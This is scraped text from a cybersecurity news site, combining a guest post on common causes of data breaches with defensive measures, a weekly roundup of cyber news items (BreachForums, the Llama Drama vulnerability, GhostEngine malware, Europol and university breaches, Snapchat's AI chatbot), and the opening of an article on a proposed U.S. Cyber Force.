The prevalence of both direct and indirect malware is increasing. Malware (inherently malicious software) is loaded onto a system by unsuspecting victims, providing hackers with opportunities to not only exploit the affected system but also potentially spread to other connected systems. This type of malware poses a significant security threat as it allows malicious insiders access to confidential information and provides the ability to steal data for financial gain. Implementing an advanced malware protection solution at multiple ingress points in the network can significantly enhance your security posture, reducing the risk that employees will fall victim to malicious software. By leveraging cutting-edge data security in malware detection and prevention, organizations can fortify their data protection defenses against evolving cyber threats and security breaches.Social Engineering
Cybercriminals and hackers can shorten the effort of establishing unauthorized access by persuading individuals with legitimate data access to do it for them. Phone calls, phishing scams, malicious links (often sent via email, text, or social media), and other forms of social engineering such as deep fakes are now commonly used to manipulate individuals into unwittingly granting access or divulging sensitive information like login credentials to cybercriminals. Such information can result in a data leak, in which hackers recycle, reuse, and trade-sensitive data like Social Security numbers or personal data for the purpose of identity theft and other illicit activities. Exercising vigilance in sharing sensitive information with external parties is quintessential. Awareness of the information being shared, and verification of legitimacy can serve as a simple yet effective defense against social engineering tactics.Ransomware
Ransomware is a type of malicious software designed to restrict access to a computer system or files until a sum of money, or ransom, is paid. It typically encrypts the victim's files or locks their system, rendering it inaccessible, and then demands payment (often in cryptocurrency) in exchange for restoring access. Ensuring the safety and protection of your infrastructure against external threats is paramount. Organizations must be confident that attackers haven’t gained access to their systems and aren’t using them for malicious activities. Implementing a robust visibility and protection solution, such as microsegmentation will be helpful in this scenario. Microsegmentation offers a straightforward, fast, and intuitive approach to enforce Zero Trust principles within your network. This solution is designed to prevent lateral movement by visualizing activity in your IT environments, implementing precise microsegmentation policies, and swiftly detecting potential breaches.Improper configuration and exposure via APIs
Misconfigured settings or parameters encompass various issues such as default passwords, open ports, or weak encryption. Such inadequacies can create vulnerabilities that hackers may exploit to gain unauthorized access to systems or data, leading to security breaches and other malicious activities. Inadequate configuration settings and vulnerabilities in APIs can expose them to a large number of security risks. Addressing and rectifying these issues is crucial to prevent unauthorized access and potential data breaches. Consider implementing proper API security and governance from code time to runtime, including regularly auditing API security measures, which are critical steps to enhance overall protection. To address misconfiguration and exposure via APIs, businesses must rely not just on their WAF but also on deploying an advanced API security solution to protect against evasive API abuses. This solution can offer comprehensive visibility, identifying vulnerabilities and detecting potential threats and abuses related to APIs. Moreover, it assists in helping organizations establish a more proactive approach to security by lowering the overall attack surface of critical APIs from secure development to runtime protection, effectively reinforcing their overall API security posture.DNS attacks
Domain Name System (DNS) attacks are malicious activities that target the DNS infrastructure to disrupt or manipulate the resolution of domain names into IP addresses. These attacks can have various objectives, including causing service disruptions using distributed denial of service (DDoS), redirecting users to malicious websites, or gaining unauthorized access to sensitive information. Organisations must deploy a strong cloud-based authoritative DNS Service ensuring 100% availability and protection against multi-vector DNS attacks like flooding and water torture attacks. Implementing best practices and deploying security countermeasures that are able to withstand the attack volume, are crucial steps to take when mitigating these attacks.Conclusion
Data breaches continue to pose a pervasive risk across various sectors, affecting organizations of all sizes and types — from healthcare and finance to e-commerce and retail. By proactively identifying potential vulnerabilities, organizations can reduce the likelihood of successful cyberattacks. Investing in robust security measures that enforce a Zero Trust Security model and ensuring their applications, APIs, and DNS services are continuously protected against cyber threats, helps mitigate financial risks associated with breaches, such as regulatory fines, legal fees, and revenue loss. By minimizing the impact of breaches, organizations can also maintain business continuity — and avoid disruptions to normal operations or damaged reputations. Overall, a comprehensive understanding of breach causes, and the implementation of appropriate security measures are vital for protecting data, minimizing risk, and ensuring the long-term success of all organizations. Disclaimer: The views and opinions expressed in this guest post are solely those of the author(s) and do not necessarily reflect the official policy or position of The Cyber Express. Any content provided by the author is of their opinion and is not intended to malign any religion, ethnic group, club, organization, company, individual, or anyone or anything.This week on TCE Cyberwatch: Snapchat AI to political unrest in Kyrgyzstan
TCE Cyberwatch Weekly Update
Explore the newest updates and empower yourself with the information needed with TCE Cyberwatch.USDoD announces plans to resurrect BreachForum’s community
The FBI's takedown of BreachForums, a key cybercrime marketplace, marked a significant victory against cybercrime. However, less than 24 hours later, the cybercriminal known as USDoD announced plans to resurrect the forum’s community. BreachForums had been central for trading stolen data and hacking tools, and its removal was a major achievement, but USDoD and another administrator, ShinyHunters, claimed that they would revive the site. USDoD vowed to launch a new forum, Breach Nation, with domains breachnation.io and databreached.io, which is set to go live on July 4, 2024. Robust infrastructure, enhanced security, and upgraded memberships to the first 200,000 users were some of the things that were offered. Read MoreGenerative AI and its impact on the insurance industry
Generative AI has become a major topic in AI discussions, especially with advanced models like OpenAI’s GPT-4 and Google’s Gemini 1.5 Pro. Bloomberg predicts that the Generative AI market will reach USD 1.3 trillion by 2032, holding potential across industries, but specifically insurance. In insurance, Generative AI is expected to revolutionize operations, streamline claims by analyzing images and documents, speed up settlements and enhance customer satisfaction, improve decision-making, and reduce errors and cases of fraud through its data analysis capabilities. Generative AI can also provide tailored recommendations and engage with customers in conversations. While Generative AI offers significant advantages, its adoption must address concerns about data privacy and ethical AI usage. Read MoreKyrgyzstan faces cyberattacks on government entities as mob violence occurs against foreign students
Bishkek, the capital of Kyrgyzstan, is currently experiencing severe mob violence and cyberattacks. The turmoil began with a viral video showing a fight between Kyrgyz and Egyptian medical students, which led to widespread violence against foreign students. Simultaneously though, Kyrgyzstan is facing severe cyberattacks from various hacktivist groups. The attackers, calling themselves Team Insane PK, have allegedly attacked multiple governmental platforms, including the Ministry of Agriculture and the Education Portal of the Ministry of Emergency Situations, as well as private entities like Saima Telecom and several universities. Additionally, Silent Cyber Force, another Pakistan-based group, has allegedly targeted Kyrgyzstan’s Ministry of Defence and Ministry of Agriculture. Read MoreU.S. election causes worry surrounding several cyberattacks, specifically those of foreign interference
With the 2024 U.S. elections approaching, foreign interference, particularly through cyberattacks, has intensified. Democratic Senator Mark Warner noted the involvement of both state and non-state actors, including hacktivists and cybercriminals, who find it increasingly easy to disrupt U.S. politics. The Cybersecurity and Infrastructure Security Agency (CISA) is at the forefront of defending against these threats. CISA Director Jen Easterly emphasized that while election infrastructure is more secure than ever, the threat environment has become more complex, with foreign adversaries and generative AI capabilities posing significant risks. In response, CISA has ramped up its efforts, offering cybersecurity assessments, physical security evaluations, and training sessions to election stakeholders. Read MoreNew Vulnerability Llama Drama spotted in Python package widely used by AI application developers
A critical vulnerability, CVE-2024-34359, dubbed Llama Drama, was recently discovered in a Python package widely used by AI application developers. Discovered by researcher Patrick Peng, the vulnerability affects the llama_cpp_python package, which integrates AI models with Python and is related to the Jinja2 template rendering tool used for generating HTML. Checkmarx, a cybersecurity firm, explained that the issue arises from llama_cpp_python using Jinja2 for processing model metadata without implementing proper security measures like sandboxing. This oversight enables template injection attacks, allowing for arbitrary code execution on systems using the affected package. More than 6,000 AI models that use llama_cpp_python and Jinja2 are impacted by this. Read MoreEuropol investigating a black hat hacker who claims to have stolen classified data from their systems
Europol is investigating a black hat hacker, IntelBroker, who claims to have stolen classified data from their system. The hacker allegedly accessed classified information, like employee data and source codes, from various branches of Europol, like the Europol Platform for Experts (EPE). IntelBroker posted screenshots as proof and later claimed to have sold the data. Europol confirmed the incident and assured that no operational data was compromised. The agency has taken initial actions, and the EPE website is temporarily down for maintenance. Additionally, IntelBroker claimed to have hacked Zscaler, a cybersecurity firm, offering to sell access to their systems. Zscaler is investigating but has not found evidence of impact, other than a test environment exposed to the internet, though it's unclear if it was involved in the breach. Read MorePalo Alto Networks' forecast falls short of investor expectations
Palo Alto Networks' fourth-quarter billings forecast fell short of investor expectations, signaling restrained corporate spending on cybersecurity amid economic uncertainty and persistent inflation. This caution has driven companies to diversify their cybersecurity investments to avoid reliance on a single vendor, leading to a reduced growth outlook for firms like Palo Alto Networks. The company projected fourth-quarter billings between $3.43 billion and $3.48 billion, aligning closely with analysts' estimates but reflecting broader concerns about slowed growth in the sector. Analysts highlighted the lack of significant positive momentum in the revised forecasts put out by Palo Alto following this. However, the forecasts follow similar cautionary predictions from rivals like Fortinet, which hint at a broader trend of cautious spending in the cybersecurity industry. Read MoreAustralia passes its first legislation for a national digital ID
Australia has passed its first legislation for a national digital ID, called myGovID, set to come into effect in November. This eliminates the need for multiple forms of physical ID. Lauren Perry from the UTS Human Technology Institute explains that the digital ID will streamline the cumbersome process of collecting and verifying multiple ID documents. The system acts as an intermediary between the user and organizations requiring identity verification. Users will interact with organizations through an app, inputting a government-registered number to confirm their identity. Currently, the myGovID app serves this purpose, but private providers like MasterCard or Visa could join the system, enhancing security and reducing fraud risks. Read MoreWestern Sydney University faces a cybersecurity breach affecting 7,500 individuals.
Western Sydney University faced a cybersecurity breach that affected around 7,500 individuals. The breach, first identified in January 2024, was traced back to May 2023 and involved unauthorized access to the university’s Microsoft Office 365 platform, including SharePoint files and email accounts., and their Solar Car Laboratory infrastructure. WSU swiftly shut down its IT network and implemented security measures upon discovering the breach. The university has assured that no ransom demands have been made for the compromised information. The NSW Police and Information and Privacy Commission are helping to investigate the incident. The NSW Supreme Court has issued an injunction to prevent the unauthorized use of the compromised data, highlighting the legal implications of such breaches. Read MoreICO releases warning about data protection risks associated with generative AI for Snapchat
The UK's Information Commissioner’s Office (ICO) has warned about the data protection risks associated with generative AI. The ICO found that the company that owned Snapchat, Snap, had not adequately assessed the data protection risks for its chatbot, which interacts with Snapchat’s 414 million daily users. The ICO issued a Preliminary Enforcement Notice to Snap-on October 6, highlighting a failure to properly evaluate privacy risks, especially for users aged 13 to 17. This led to Snap undertaking a comprehensive risk assessment and implementing the necessary steps, which the ICO then deemed to fit data protection laws. Snapchat has integrated prevention of harmful responses from the chatbot and is working on additional tools to give parents more control over their children’s use of 'My AI'. The ICO will continue to monitor Snapchats generative AI developments and enforce compliance to protect public privacy rights. Read MoreNew malware named GhostEngine to exploit vulnerable drivers and install crypto mining software
A novel malware campaign dubbed "REF4578" uses a malware called GhostEngine to disable endpoint detection and response (EDR) solutions and install crypto mining software. The malware exploits vulnerable drivers to terminate EDR agents, ensuring the persistence of the XMRig miner, which is used to mine Monero cryptocurrency without detection. The malware also installs a backdoor and includes an EDR agent controller and miner module to tamper with security tools and enable remote command execution via a PowerShell script. Researchers at Antiy Labs, despite extensive analysis, were unable to identify specific targets or the threat actor behind the campaign. To detect GhostEngine, organizations should monitor for initial suspicious activities such as unusual PowerShell execution, execution from uncommon directories, privilege elevation, and vulnerable driver deployment. Key indicators include abnormal network traffic, DNS lookups pointing to mining pool domains, and specific behavior prevention events like unusual process execution and tampering with Windows Defender. Read MoreWrap Up
The ever-evolving landscape of cybersecurity requires constant vigilance. By staying informed about the latest threats and taking proactive measures, we can minimize the impact of cyberattacks and protect ourselves online. As always, we can see that there is unrest present everywhere and cybercrimes play a huge role in that. TCE Cyberwatch is committed to keeping you informed about the latest developments in cybersecurity. Stay tuned for more in-depth analysis and actionable advice. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.The U.S. Moves a Step Closer to a Cyber Force
CYBERCOM Under Siege
Cyber defense has been under the U.S. Cyber Command, or CYBERCOM, since 2010. CYBERCOM brings together personnel from the separate service branches, but that arrangement has come under increasing scrutiny as an inadequate solution to a growing global threat. A 2022 GAO study noted problems with cyber training, staffing and retention across the service branches, and a Foundation for Defense of Democracies (FDD) study in March of this year detailed problems with the lack of a singular approach to cyber defense. “The inefficient division of labor between the Army, Navy, Air Force, and Marine Corps prevents the generation of a cyber force ready to carry out its mission,” the FDD report said.“Recruitment suffers because cyber operations are not a top priority for any of the services, and incentives for new recruits vary wildly. The services do not coordinate to ensure that trainees acquire a consistent set of skills or that their skills correspond to the roles they will ultimately fulfill at CYBERCOM.”Promotion systems often hold back skilled cyber personnel because the systems were designed to evaluate service members who operate on land, at sea, or in the air, not in cyberspace. Retention rates for qualified personnel are low because of inconsistent policies, institutional cultures that do not value cyber expertise, and insufficient opportunities for advanced training. “Resolving these issues requires the creation of a new independent armed service – a U.S. Cyber Force – alongside the Army, Navy, Air Force, Marine Corps, and Space Force.” The FDD report concluded, “America’s cyber force generation system is clearly broken. Fixing it demands nothing less than the establishment of an independent cyber service.”